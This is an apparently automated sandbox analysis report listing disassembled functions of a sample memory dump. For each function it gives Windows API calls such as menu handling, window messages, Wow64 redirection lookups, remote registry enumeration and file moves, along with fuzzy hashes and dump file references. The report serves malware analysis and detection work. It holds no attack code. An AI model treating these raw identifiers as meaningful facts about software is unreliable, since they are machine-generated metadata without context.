                                                                                                    • Opcode Fuzzy Hash: 45f74fc5f0cf5a1fc2cfdcf75a0bda1c9e52e5872b71a3569d0b16c37e3de86b
                                                                                                    • Instruction Fuzzy Hash: 1AE0757A105605BBDB011FE5FD0C94AFF79FF49722B508625F22982471CB329461DF91
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 001DCD90 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 191windowCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                      • Part of subcall function 00174154: _wcslen.LIBCMT ref: 00174159
                                                                                                    • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 001DCEAE
                                                                                                    • _wcslen.LIBCMT ref: 001DCEF5
                                                                                                    • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 001DCF5C
                                                                                                    • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 001DCF8A
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.1605808658.0000000000171000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00170000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.1605754470.0000000000170000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1605954628.000000000020D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1605954628.0000000000233000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1606042874.000000000023D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1606093728.0000000000245000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_170000_ewdbwwfpdh.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ItemMenu$Info_wcslen$Default
                                                                                                    • String ID: 0
                                                                                                    • API String ID: 1227352736-4108050209
                                                                                                    • Opcode ID: 6b10e89dfa4879360954b6c3df34607107e99c63eb506d5ba3fdabcad7654065
                                                                                                    • Instruction ID: 61da32ec452a0ac2a0e0f97ece78801e81cd8a3fa286cabdf222171c10aa120e
                                                                                                    • Opcode Fuzzy Hash: 6b10e89dfa4879360954b6c3df34607107e99c63eb506d5ba3fdabcad7654065
                                                                                                    • Instruction Fuzzy Hash: 0451C1716143029FDB159F28C885BABBBE5AF99314F040E2EF995D23A0DB70DD44C792
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 002046DB Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 101windowCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00204794
                                                                                                    • IsMenu.USER32(?), ref: 002047A9
                                                                                                    • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 002047F1
                                                                                                    • DrawMenuBar.USER32 ref: 00204804
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.1605808658.0000000000171000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00170000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.1605754470.0000000000170000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1605954628.000000000020D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1605954628.0000000000233000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1606042874.000000000023D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1606093728.0000000000245000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_170000_ewdbwwfpdh.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Menu$Item$DrawInfoInsert
                                                                                                    • String ID: 0
                                                                                                    • API String ID: 3076010158-4108050209
                                                                                                    • Opcode ID: 9d625b9650b941c1bbb2a7af81b44c9362d4470d3bec28633afcd27bb9efd370
                                                                                                    • Instruction ID: c4b2a5a8f51547c8f89435f6e0f230fb985b887b2fd42f28de538d8c6a805a2a
                                                                                                    • Opcode Fuzzy Hash: 9d625b9650b941c1bbb2a7af81b44c9362d4470d3bec28633afcd27bb9efd370
                                                                                                    • Instruction Fuzzy Hash: 3D414CB4A2134AEFDB20DF50E884AAABBB4FF45314F048519FA0597291C730ED64CB50
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 001D2672 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 93windowCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                      • Part of subcall function 0017B25F: _wcslen.LIBCMT ref: 0017B269
                                                                                                      • Part of subcall function 001D4536: GetClassNameW.USER32(?,?,000000FF), ref: 001D4559
                                                                                                    • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 001D26F6
                                                                                                    • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 001D2709
                                                                                                    • SendMessageW.USER32(?,00000189,?,00000000), ref: 001D2739
                                                                                                      • Part of subcall function 001784B7: _wcslen.LIBCMT ref: 001784CA
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.1605808658.0000000000171000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00170000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.1605754470.0000000000170000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1605954628.000000000020D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1605954628.0000000000233000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1606042874.000000000023D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1606093728.0000000000245000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_170000_ewdbwwfpdh.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: MessageSend$_wcslen$ClassName
                                                                                                    • String ID: ComboBox$ListBox
                                                                                                    • API String ID: 2081771294-1403004172
                                                                                                    • Opcode ID: 0633bc40099773f066c6888023572b8eba33eb7def7c583421ccceddc376ff3a
                                                                                                    • Instruction ID: 96c8f6323e6ddb92ae1d33f2080cb4af82e3f68f76c3b315e6b4c409ff50300d
                                                                                                    • Opcode Fuzzy Hash: 0633bc40099773f066c6888023572b8eba33eb7def7c583421ccceddc376ff3a
                                                                                                    • Instruction Fuzzy Hash: 69212971900204BFDB24ABB4DC89DFEB7B9EF75764F14811AF421A32E1DB785906C610
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 001CE71E Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloaderCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • LoadLibraryA.KERNEL32 ref: 001CE72B
                                                                                                    • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 001CE73D
                                                                                                    • FreeLibrary.KERNEL32(00000000), ref: 001CE763
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.1605808658.0000000000171000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00170000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.1605754470.0000000000170000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1605954628.000000000020D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1605954628.0000000000233000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1606042874.000000000023D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1606093728.0000000000245000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_170000_ewdbwwfpdh.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Library$AddressFreeLoadProc
                                                                                                    • String ID: GetSystemWow64DirectoryW$X64
                                                                                                    • API String ID: 145871493-2590602151
                                                                                                    • Opcode ID: c8db128caa12d21eba0e7c03cbc9bc33764dc658ada784ccf37a14ce4063de82
                                                                                                    • Instruction ID: ebdcafd406d3ade8677ccfa2ca6ec12d6300449160ef4d664eb16407fbf507ba
                                                                                                    • Opcode Fuzzy Hash: c8db128caa12d21eba0e7c03cbc9bc33764dc658ada784ccf37a14ce4063de82
                                                                                                    • Instruction Fuzzy Hash: 10F0ED71827720ABDB7A2B604C4CF69B6A8AF31700F16049CF849E6052DF30CE488B98
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00176332 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 24libraryloaderCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • LoadLibraryA.KERNEL32(kernel32.dll,?,?,0017637F,?,?,001760AA,?,00000001,?,?,00000000), ref: 0017633E
                                                                                                    • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00176350
                                                                                                    • FreeLibrary.KERNEL32(00000000,?,?,0017637F,?,?,001760AA,?,00000001,?,?,00000000), ref: 00176362
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.1605808658.0000000000171000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00170000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.1605754470.0000000000170000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1605954628.000000000020D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1605954628.0000000000233000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1606042874.000000000023D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1606093728.0000000000245000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_170000_ewdbwwfpdh.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Library$AddressFreeLoadProc
                                                                                                    • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                                                                                    • API String ID: 145871493-3689287502
                                                                                                    • Opcode ID: 778b144c7f309265f44429a44d8b746551809ed655b644be56ae8b4893b6b29f
                                                                                                    • Instruction ID: c04db2cffbbf7749b67074a5abfec522162c2b6546853b72d4320dc047c80b96
                                                                                                    • Opcode Fuzzy Hash: 778b144c7f309265f44429a44d8b746551809ed655b644be56ae8b4893b6b29f
                                                                                                    • Instruction Fuzzy Hash: B1E08C32A03F2257D3222769BC0CA6AE628AF96B22B094015F90CE2241DFA0CC01C0B0
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 001762FB Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 22libraryloaderCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • LoadLibraryA.KERNEL32(kernel32.dll,?,?,001B54C3,?,?,001760AA,?,00000001,?,?,00000000), ref: 00176304
                                                                                                    • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00176316
                                                                                                    • FreeLibrary.KERNEL32(00000000,?,?,001B54C3,?,?,001760AA,?,00000001,?,?,00000000), ref: 00176329
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.1605808658.0000000000171000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00170000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.1605754470.0000000000170000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1605954628.000000000020D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1605954628.0000000000233000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1606042874.000000000023D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1606093728.0000000000245000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_170000_ewdbwwfpdh.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Library$AddressFreeLoadProc
                                                                                                    • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                                                                                    • API String ID: 145871493-1355242751
                                                                                                    • Opcode ID: 7b983837343fb014e9373f436e09e370e6293ad29d570f6369ba4e1f57afa737
                                                                                                    • Instruction ID: 8784144dc06a348310b9021012249dbb2df78bad8ae572c70c00d420ca9b072e
                                                                                                    • Opcode Fuzzy Hash: 7b983837343fb014e9373f436e09e370e6293ad29d570f6369ba4e1f57afa737
                                                                                                    • Instruction Fuzzy Hash: B4D01236657B215B93222765BC1C98EBE24EF8AB113494015B80CA2169CF64CD11C5E0
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 001FACE6 Relevance: 7.8, APIs: 5, Instructions: 256COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetCurrentProcessId.KERNEL32 ref: 001FAD86
                                                                                                    • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 001FAD94
                                                                                                    • GetProcessIoCounters.KERNEL32(00000000,?), ref: 001FADC7
                                                                                                    • CloseHandle.KERNEL32(?), ref: 001FAF9C
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.1605808658.0000000000171000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00170000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.1605754470.0000000000170000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1605954628.000000000020D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1605954628.0000000000233000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1606042874.000000000023D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1606093728.0000000000245000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_170000_ewdbwwfpdh.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Process$CloseCountersCurrentHandleOpen
                                                                                                    • String ID:
                                                                                                    • API String ID: 3488606520-0
                                                                                                    • Opcode ID: 15115afba4003087dc8091f864ad8bbee03c1880d65d723cf13a9510e5c705ae
                                                                                                    • Instruction ID: 83032e65f2ae891aa80c1224c9666459738ca109aa6eac84b1ecb89ab585d110
                                                                                                    • Opcode Fuzzy Hash: 15115afba4003087dc8091f864ad8bbee03c1880d65d723cf13a9510e5c705ae
                                                                                                    • Instruction Fuzzy Hash: 01A1BFB1604300AFD720EF24C896F2AB7E5AF58714F54885DF69D9B292DB74EC41CB82
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 001FC328 Relevance: 7.7, APIs: 5, Instructions: 167registryCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                      • Part of subcall function 0017B25F: _wcslen.LIBCMT ref: 0017B269
                                                                                                      • Part of subcall function 001FD2F7: CharUpperBuffW.USER32(?,?,?,?,?,?,?,001FC00D,?,?), ref: 001FD314
                                                                                                      • Part of subcall function 001FD2F7: _wcslen.LIBCMT ref: 001FD350
                                                                                                      • Part of subcall function 001FD2F7: _wcslen.LIBCMT ref: 001FD3C7
                                                                                                      • Part of subcall function 001FD2F7: _wcslen.LIBCMT ref: 001FD3FD
                                                                                                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 001FC404
                                                                                                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 001FC45F
                                                                                                    • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 001FC4C2
                                                                                                    • RegCloseKey.ADVAPI32(?,?), ref: 001FC505
                                                                                                    • RegCloseKey.ADVAPI32(00000000), ref: 001FC512
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.1605808658.0000000000171000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00170000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.1605754470.0000000000170000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1605954628.000000000020D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1605954628.0000000000233000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1606042874.000000000023D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1606093728.0000000000245000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_170000_ewdbwwfpdh.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpper
                                                                                                    • String ID:
                                                                                                    • API String ID: 826366716-0
                                                                                                    • Opcode ID: a7c23474a4e14d5e5a8598a64250143ec88fa5b3fd308da00c2d9f2add1ece7b
                                                                                                    • Instruction ID: 2a23e057f31666f5e7daadc7c4a50ec5ad917f8a51da15e59e901ebd9e95b9c2
                                                                                                    • Opcode Fuzzy Hash: a7c23474a4e14d5e5a8598a64250143ec88fa5b3fd308da00c2d9f2add1ece7b
                                                                                                    • Instruction Fuzzy Hash: 1D619E31208249AFD714DF24C994E7ABBF5BF84308F14849CF55A8B2A2CB31ED45DB92
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 001DEC27 Relevance: 7.7, APIs: 5, Instructions: 167filestringCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                      • Part of subcall function 001DE60C: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,001DD6E2,?), ref: 001DE629
                                                                                                      • Part of subcall function 001DE60C: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,001DD6E2,?), ref: 001DE642
                                                                                                      • Part of subcall function 001DE9C5: GetFileAttributesW.KERNELBASE(?,001DD755), ref: 001DE9C6
                                                                                                    • lstrcmpiW.KERNEL32(?,?), ref: 001DEC9F
                                                                                                    • MoveFileW.KERNEL32(?,?), ref: 001DECD8
                                                                                                    • _wcslen.LIBCMT ref: 001DEE17
                                                                                                    • _wcslen.LIBCMT ref: 001DEE2F
                                                                                                    • SHFileOperationW.SHELL32(?,?,?,?,?,?), ref: 001DEE7C
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.1605808658.0000000000171000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00170000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.1605754470.0000000000170000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1605954628.000000000020D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1605954628.0000000000233000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1606042874.000000000023D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1606093728.0000000000245000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_170000_ewdbwwfpdh.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: File$FullNamePath_wcslen$AttributesMoveOperationlstrcmpi
                                                                                                    • String ID:
                                                                                                    • API String ID: 3183298772-0
                                                                                                    • Opcode ID: 847419335d55fe4279450203eb71da56f0f48f3d5682f18477726f6f625a29a5
                                                                                                    • Instruction ID: 30c9fc44ca9b6191825ce4ac206b3025d44109d4e46a97fa4c2d14bc8e3bd413
                                                                                                    • Opcode Fuzzy Hash: 847419335d55fe4279450203eb71da56f0f48f3d5682f18477726f6f625a29a5
                                                                                                    • Instruction Fuzzy Hash: 2E5162B24083859BC774EBA4D881ADF73ECAF94311F40492FF58997152EF70A6888756
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 001A23E1 Relevance: 7.6, APIs: 5, Instructions: 129COMMONLIBRARYCODE
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.1605808658.0000000000171000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00170000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.1605754470.0000000000170000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1605954628.000000000020D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1605954628.0000000000233000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1606042874.000000000023D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1606093728.0000000000245000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_170000_ewdbwwfpdh.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _free
                                                                                                    • String ID:
                                                                                                    • API String ID: 269201875-0
                                                                                                    • Opcode ID: 25cd0891853c43d822d0d69cb490d4faca4e64076ea127b8735955dc510441ac
                                                                                                    • Instruction ID: 70330cd56d4e655b23d03d5ef1a51e0ed745d6ca0fcd6f6d3abdb68ad881c646
                                                                                                    • Opcode Fuzzy Hash: 25cd0891853c43d822d0d69cb490d4faca4e64076ea127b8735955dc510441ac
                                                                                                    • Instruction Fuzzy Hash: 4B41D13AA002049FDB24DF7CC881A5DB7E6EF8A714F1541A8E515EB291D731ED42CB80
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 001E41CE Relevance: 7.6, APIs: 5, Instructions: 101windowCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetInputState.USER32 ref: 001E4225
                                                                                                    • TranslateAcceleratorW.USER32(?,00000000,?), ref: 001E427C
                                                                                                    • TranslateMessage.USER32(?), ref: 001E42A5
                                                                                                    • DispatchMessageW.USER32(?), ref: 001E42AF
                                                                                                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 001E42C0
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.1605808658.0000000000171000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00170000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.1605754470.0000000000170000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1605954628.000000000020D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1605954628.0000000000233000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1606042874.000000000023D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1606093728.0000000000245000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_170000_ewdbwwfpdh.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Message$Translate$AcceleratorDispatchInputPeekState
                                                                                                    • String ID:
                                                                                                    • API String ID: 2256411358-0
                                                                                                    • Opcode ID: 8223b98c6cb3fc58a5403027106fe4175e98c7aa9a0a161c443b37e0e805a84e
                                                                                                    • Instruction ID: 943ac94ca4c1ae2b488634af949e0d9224cde0b2824969e759fce9774b8f73a4
                                                                                                    • Opcode Fuzzy Hash: 8223b98c6cb3fc58a5403027106fe4175e98c7aa9a0a161c443b37e0e805a84e
                                                                                                    • Instruction Fuzzy Hash: 2E31C634900786DFEB35CB76FC0CBBE7BA8EB15304F44056DF562820A0D7649889CB21
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 001D2191 Relevance: 7.6, APIs: 5, Instructions: 93sleepwindowCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetWindowRect.USER32(?,?), ref: 001D21A5
                                                                                                    • PostMessageW.USER32(00000001,00000201,00000001), ref: 001D2251
                                                                                                    • Sleep.KERNEL32(00000000,?,?,?), ref: 001D2259
                                                                                                    • PostMessageW.USER32(00000001,00000202,00000000), ref: 001D226A
                                                                                                    • Sleep.KERNEL32(00000000,?,?,?,?), ref: 001D2272
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.1605808658.0000000000171000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00170000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.1605754470.0000000000170000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1605954628.000000000020D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1605954628.0000000000233000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1606042874.000000000023D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1606093728.0000000000245000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_170000_ewdbwwfpdh.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: MessagePostSleep$RectWindow
                                                                                                    • String ID:
                                                                                                    • API String ID: 3382505437-0
                                                                                                    • Opcode ID: ee49177b7a2a3b33b4cd2fcd453162a46946501311dae457e14b5fcf52056637
                                                                                                    • Instruction ID: 1815183f1863154d03376b84ffc8e891c74ad7e6248c392d0f993b4c43720e21
                                                                                                    • Opcode Fuzzy Hash: ee49177b7a2a3b33b4cd2fcd453162a46946501311dae457e14b5fcf52056637
                                                                                                    • Instruction Fuzzy Hash: AB31C071900219EFDB04CFA8DD8DADE7BB5EB24315F10422AFA35A72D1C770A944CB90
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00206065 Relevance: 7.6, APIs: 5, Instructions: 82windowCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • SendMessageW.USER32(?,00001053,000000FF,?), ref: 002060A4
                                                                                                    • SendMessageW.USER32(?,00001074,?,00000001), ref: 002060FC
                                                                                                    • _wcslen.LIBCMT ref: 0020610E
                                                                                                    • _wcslen.LIBCMT ref: 00206119
                                                                                                    • SendMessageW.USER32(?,00001002,00000000,?), ref: 00206175
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.1605808658.0000000000171000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00170000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.1605754470.0000000000170000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1605954628.000000000020D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1605954628.0000000000233000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1606042874.000000000023D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1606093728.0000000000245000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_170000_ewdbwwfpdh.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: MessageSend$_wcslen
                                                                                                    • String ID:
                                                                                                    • API String ID: 763830540-0
                                                                                                    • Opcode ID: 7ed5d7962939ff9e05e1451aeb6600a2eef86f84e3ff8e0bd0623869769369c8
                                                                                                    • Instruction ID: 241d64d18dcefccdae65aa9b38455b4c0db97786fd7bb685153d5fa2c7385b23
                                                                                                    • Opcode Fuzzy Hash: 7ed5d7962939ff9e05e1451aeb6600a2eef86f84e3ff8e0bd0623869769369c8
                                                                                                    • Instruction Fuzzy Hash: B7218271910319ABDF109FA5DC889EEBBB8FF05324F104216F929EA2C6D7B095A5CF50
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 001D089E Relevance: 7.5, APIs: 5, Instructions: 47stringCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,001D07D1,80070057,?,?,?,001D0BEE), ref: 001D08BB
                                                                                                    • ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,001D07D1,80070057,?,?), ref: 001D08D6
                                                                                                    • lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,001D07D1,80070057,?,?), ref: 001D08E4
